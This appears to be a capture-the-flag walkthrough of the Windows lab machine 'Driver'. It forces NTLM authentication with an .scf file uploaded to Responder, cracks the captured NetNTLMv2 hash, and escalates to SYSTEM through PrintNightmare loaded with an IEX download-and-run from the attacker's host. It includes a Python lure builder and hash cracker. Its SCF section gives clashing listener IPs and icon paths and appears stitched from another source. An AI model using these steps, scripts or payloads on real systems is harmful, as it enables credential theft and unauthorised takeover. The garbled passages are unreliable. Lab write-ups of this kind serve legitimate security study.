Enumeration With Nmap
nmap -p- --min-rate 10000 -oA nmap/allports -v 10.10.11.106
# Nmap 7.91 scan initiated Wed Dec 1 08:23:44 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.10.11.106
Increasing send delay for 10.10.11.106 from 0 to 5 due to 11 out of 17 dropped probes since last increase.
Nmap scan report for 10.10.11.106
Host is up (0.26s latency).
Not shown: 65531 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
5985/tcp open  wsman
Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Dec 1 08:25:21 2021 -- 1 IP address (1 host up) scanned in 97.47 seconds
Now let's use nmap's default scripts and service detection to get more information from the target.
nmap -sC -sV -oA nmap/normal -p 80,135,445,5985 10.10.11.106
# Nmap 7.91 scan initiated Wed Dec 1 08:25:42 2021 as: nmap -sC -sV -oA nmap/normal -p 80,135,445,5985 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.27s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 9h59m53s, deviation: 0s, median: 9h59m53s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-12-01T17:25:51
|_  start_date: 2021-12-01T13:29:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 1 08:26:33 2021 -- 1 IP address (1 host up) scanned in 51.33 seconds
So we are dealing with a Windows box (hostname DRIVER). We have some interesting ports: HTTP on 80, SMB on 445 and WinRM on 5985, plus RPC on 135. The web server answers with a 401 and the Basic auth realm "MFP Firmware Update Center", so the site is password protected. Let's start our enumeration on SMB and see if we have anonymous access to a share.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106]
└─$ smbclient -L //10.10.11.106/ -N
session setup failed: NT_STATUS_ACCESS_DENIED
Boom, no anonymous access to SMB. Time to see what we have on the HTTP port.
It seems we need credentials. The realm names the account as admin, so let's try the obvious guesses.
Boom, we are in. Let's look around to see what we can find and loot.
We found an upload page, which seems interesting. I tried uploading a PHP reverse shell to see what would happen, but nothing came of it, and I was unable to find where the uploaded file was stored, so I decided to read around and get more information about what we are dealing with.
Forced Authentication In Windows
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443.
Some pretty good resources on this: Credential Access, Stealing hashes, Forced Authentication. Now back to exploiting it.
Execution via .SCF
Place the fa.scf file below on the attacker-controlled machine at 10.0.0.7, in a shared folder called tools (the folder I will be creating):
[Shell]
Command=2
IconFile=\\10.0.0.5\tools\nc.ico
[Taskbar]
Command=ToggleDesktop
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106]
└─$ cd tools

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106/tools]
└─$ ls
@fa.scf

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106/tools]
└─$ cat @fa.scf
[Shell]
Command=2
IconFile=\\10.0.0.5\share\muzec.ico
[Taskbar]
Command=ToggleDesktop
A victim user, low, opens the share \\10.0.0.7\tools and the fa.scf gets executed automatically, which in turn forces the victim system to attempt to authenticate to the attacking system at 10.0.0.5, where Responder is listening:
sudo responder -I tun0 -wrfv
Now let's upload the SCF file through the upload page we found, submit it, and go back to see what Responder has for us.
Boom, hashes flying! Now let's save the hash to a file and crack it with John the Ripper. (The "No password hashes left to crack" line below means john had already cracked this hash in an earlier run and found the result in its pot file, which is why john --show prints it straight away.)
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106]
└─$ cat hash
tony::DRIVER:8a951208ff761ccb[...]

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
No password hashes left to crack (see FAQ)

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106]
└─$ john --show hash
tony:liltony:DRIVER:8a951208ff761ccb:84E8A643D43D7A11C1079DC2518D854B:0101000000000000C0653150DE09D201260A1A1D9BF576BD000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000200000BDA5F8BCE4AC6BDB9CA217BA5B8DE361269F945ABF489FF68EE134226EBB88CC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003700000000000000000000000000

1 password hash cracked, 0 left
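To tie the two pieces above together (the .scf lure from the Execution via .SCF section and the NetNTLMv2 response that Responder captured and john cracked), here is an added example that is not part of the original write-up. It builds the .scf for a given listener IP (the UNC path in IconFile has to point at the interface Responder is bound to, here tun0, and a leading @ in the file name sorts it to the top of the share listing so Explorer resolves it first), parses a Responder hash line, and verifies candidate passwords offline the same way john's netntlmv2 format does: NTProofStr = HMAC-MD5(HMAC-MD5(MD4(UTF-16LE(password)), UTF-16LE(UPPER(user) + domain)), server challenge || blob). MD4 is implemented by hand because hashlib's md4 is usually unavailable under OpenSSL 3. The helper names, the sample wordlist and the forged capture in the demo are my own constructions; paste the line from the cat hash output above into crack() to run it against the real capture.

```python
"""Forced authentication, end to end: build the .scf lure, parse the
NetNTLMv2 line Responder prints, and verify candidate passwords offline.

Added example (not from the original write-up). Helper names, the sample
wordlist and the forged capture below are constructed for illustration.
"""
import hashlib
import hmac
import struct
from typing import Optional

MASK32 = 0xFFFFFFFF


def scf_lure(listener_ip: str, share: str = "share", icon: str = "x.ico") -> str:
    """Return .scf content. Explorer resolves IconFile as soon as the folder
    holding the file is listed, so the browsing user's NTLM response goes to
    listener_ip (the interface Responder is bound to)."""
    return (
        "[Shell]\r\nCommand=2\r\n"
        f"IconFile=\\\\{listener_ip}\\{share}\\{icon}\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    )


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is often disabled)."""
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    def rol(x, n): return ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):                       # round 1
            s = (3, 7, 11, 19)[i % 4]
            a, b, c, d = d, rol((a + F(b, c, d) + X[i]) & MASK32, s), b, c
        for i in range(16):                       # round 2
            s, k = (3, 5, 9, 13)[i % 4], (i % 4) * 4 + i // 4
            a, b, c, d = d, rol((a + G(b, c, d) + X[k] + 0x5A827999) & MASK32, s), b, c
        for i in range(16):                       # round 3
            s = (3, 9, 11, 15)[i % 4]
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK32, s), b, c
        state = [(v + w) & MASK32 for v, w in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    ident = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash(password), ident, hashlib.md5).digest()


def parse_capture(line: str) -> dict:
    """Responder/john line: user::DOMAIN:serverchallenge:NTProofStr:blob.
    `john --show` fills the empty second field with the cracked password."""
    fields = line.strip().split(":")
    if len(fields) != 6:
        raise ValueError("expected 6 colon-separated fields")
    user, _cracked, domain, challenge, proof, blob = fields
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def verify(capture: dict, password: str) -> bool:
    """NTProofStr = HMAC-MD5(NTOWFv2, server_challenge || blob)."""
    key = ntlmv2_key(password, capture["user"], capture["domain"])
    proof = hmac.new(key, capture["challenge"] + capture["blob"], hashlib.md5).digest()
    return hmac.compare_digest(proof, capture["proof"])


def forge_capture(user: str, domain: str, password: str, challenge: bytes, blob: bytes) -> str:
    """Build a line exactly as Responder prints it, to exercise the verifier
    without a live capture (constructed data, not a real response)."""
    proof = hmac.new(ntlmv2_key(password, user, domain), challenge + blob, hashlib.md5).digest()
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex().upper()}:{blob.hex()}"


def crack(line: str, wordlist) -> Optional[str]:
    """Return the first wordlist entry that verifies, or None."""
    cap = parse_capture(line)
    return next((pw for pw in wordlist if verify(cap, pw)), None)


if __name__ == "__main__":
    print(scf_lure("10.10.14.77"))
    # Synthetic capture: the page's server challenge, a minimal NTLMv2 blob.
    line = forge_capture("tony", "DRIVER", "liltony", bytes.fromhex("8a951208ff761ccb"),
                         bytes.fromhex("0101000000000000") + b"\x00" * 24)
    print(line)
    print("cracked:", crack(line, ["password", "Summer2021", "liltony"]))
```

The verifier is deliberately the same computation john performs, so a line that verifies here will crack in john and vice versa; the only difference is speed, which is why a wordlist the size of rockyou belongs in john and this script belongs in your toolbox for checking a single candidate or a captured line you do not fully trust.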
Now, since the WinRM port 5985 is open, let's hit it with the credentials using evil-winrm:
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106]
└─$ evil-winrm -i driver.htb -u tony
Enter Password:
Boom, we are in.
With user.txt in hand, it's time to get SYSTEM. I really spent some time here: I ran winPEAS but got nothing, so while doing research I found something interesting about a printer.
Since the machine is themed around a printer (the web app calls itself an MFP firmware update center), let's give it a shot and confirm whether it is really vulnerable.
Windows Print Spooler Remote Code Execution Vulnerability (CVE-2021-34527)
Summary
A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
UPDATE July 7, 2021: The security update for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 have been released. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability.
In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (Note: these registry keys do not exist by default, and therefore are already at the secure setting), and also that your Group Policy settings are correct (see FAQ):
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint
NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)
UpdatePromptSettings = 0 (DWORD) or not defined (default setting)
Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.
UPDATE July 6, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability. See also KB5005010: Restricting installation of new printer drivers after applying the July 6, 2021 updates.
Note that the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as “PrintNightmare”, documented in CVE-2021-34527.
Get-Service -Name Spooler
Boom, it's running. Now let's exploit it.
The exploit (CVE-2021-34527.ps1, which provides Invoke-Nightmare) is written in PowerShell; let's download it and load it on the target straight from a web server on our attacking machine.
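Before moving on to the exploit, here is an added example (not from the original write-up) that turns the two checks the advisory text above asks for into a verdict: whether the Spooler service is running (the precondition, which is what Get-Service -Name Spooler just showed) and whether the two Point and Print values under the PointAndPrint key are 0 or not defined. It parses the output of Get-Service -Name Spooler and of reg query on that key, which you would collect over the evil-winrm session; the two sample outputs embedded below are constructed in the format those commands print. One caveat the advisory makes and the code repeats: the registry values only matter after patching. An unpatched host such as this box is exploitable with the keys undefined, so "settings secure" here never means "not vulnerable". The KB5005010 value RestrictDriverInstallationToAdministrators is reported as extra information; its name is not on this page and is my addition.

```python
"""Turn the Print Spooler / Point and Print checks from the CVE-2021-34527
advisory into a verdict, from output collected on the target.

Added example (not from the original write-up). The command outputs below
are constructed samples in the format `Get-Service -Name Spooler` and
`reg query` print; collect the real ones over the evil-winrm session.
"""
import re

POINT_AND_PRINT_KEY = r"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
ADVISORY_VALUES = ("NoWarningNoElevationOnInstall", "UpdatePromptSettings")

# Constructed sample of `Get-Service -Name Spooler` output.
SAMPLE_SERVICE_RUNNING = """
Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler
"""
SAMPLE_SERVICE_STOPPED = SAMPLE_SERVICE_RUNNING.replace("Running", "Stopped")

# Constructed sample of `reg query "<POINT_AND_PRINT_KEY>"`: both values set.
SAMPLE_REG_WEAK = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint
    NoWarningNoElevationOnInstall    REG_DWORD    0x1
    UpdatePromptSettings    REG_DWORD    0x2
"""
# Constructed sample: values explicitly 0 plus the KB5005010 restriction.
SAMPLE_REG_HARDENED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint
    NoWarningNoElevationOnInstall    REG_DWORD    0x0
    UpdatePromptSettings    REG_DWORD    0x0
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x1
"""
# Constructed sample: the policy key does not exist at all (the default).
SAMPLE_REG_MISSING = "ERROR: The system was unable to find the specified registry key or value.\n"


def parse_reg_query(text: str) -> dict:
    """Return {value_name: int} for every REG_DWORD line. A missing key or
    value yields no entry, which the advisory treats as the secure default."""
    values = {}
    for line in text.splitlines():
        m = re.match(r"^\s+(\S+)\s+REG_DWORD\s+(0x[0-9A-Fa-f]+|\d+)\s*$", line)
        if m:
            values[m.group(1)] = int(m.group(2), 0)
    return values


def spooler_running(get_service_text: str) -> bool:
    """Read the Status column of `Get-Service -Name Spooler` output."""
    for line in get_service_text.splitlines():
        cols = line.split()
        if len(cols) >= 2 and cols[1].lower() == "spooler":
            return cols[0].lower() == "running"
    return False


def assess(get_service_text: str, reg_text: str) -> dict:
    """Spooler running is the precondition the exploit needs; the two values
    are what the advisory says to confirm after patching (0 or not defined).
    This does not check whether the July 2021 updates are installed."""
    reasons = []
    running = spooler_running(get_service_text)
    reasons.append("Spooler service is " + ("running" if running else "not running"))
    values = parse_reg_query(reg_text)
    secure = True
    for name in ADVISORY_VALUES:
        v = values.get(name)
        if v in (None, 0):
            reasons.append(f"{name} {'not defined' if v is None else '= 0'} (secure default)")
        else:
            secure = False
            reasons.append(f"{name} = {v}; advisory requires 0 or not defined")
    if values.get("RestrictDriverInstallationToAdministrators") == 1:
        reasons.append("RestrictDriverInstallationToAdministrators = 1 (KB5005010 control present)")
    else:
        reasons.append("RestrictDriverInstallationToAdministrators not set to 1 (KB5005010 control absent)")
    return {"spooler_running": running, "settings_secure": secure, "reasons": reasons}


if __name__ == "__main__":
    cases = (("weak values", SAMPLE_SERVICE_RUNNING, SAMPLE_REG_WEAK),
             ("key missing", SAMPLE_SERVICE_RUNNING, SAMPLE_REG_MISSING),
             ("hardened", SAMPLE_SERVICE_RUNNING, SAMPLE_REG_HARDENED),
             ("spooler stopped", SAMPLE_SERVICE_STOPPED, SAMPLE_REG_WEAK))
    for label, svc, reg in cases:
        r = assess(svc, reg)
        print(f"{label}: spooler_running={r['spooler_running']} settings_secure={r['settings_secure']}")
        for reason in r["reasons"]:
            print("   -", reason)
```

On the box itself the equivalent one-liners are the Get-Service call already shown and reg query against POINT_AND_PRINT_KEY; the value of scripting it is that the "not defined" case is handled the way the advisory defines it instead of being mistaken for an error.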
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.77:8000/CVE-2021-34527.ps1')"
But when I tried to run Invoke-Nightmare after loading the script that way, it failed (the first form spawns a child powershell.exe, so the function was defined in that child process and gone once it exited), so I fetched it again with iex in the current session:
iex (New-Object Net.WebClient).DownloadString("http://10.10.14.77:8000/CVE-2021-34527.ps1")
So let's run it again.
Invoke-Nightmare -DriverName "Xerox" -NewUser "muzec" -NewPassword "muzec"
Boom boom, exploited successfully: muzec was added as a local administrator. Cool, let's confirm it.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106]
└─$ evil-winrm -i driver.htb -u muzec
We are done. Thanks for reading.
Greetings from Muzec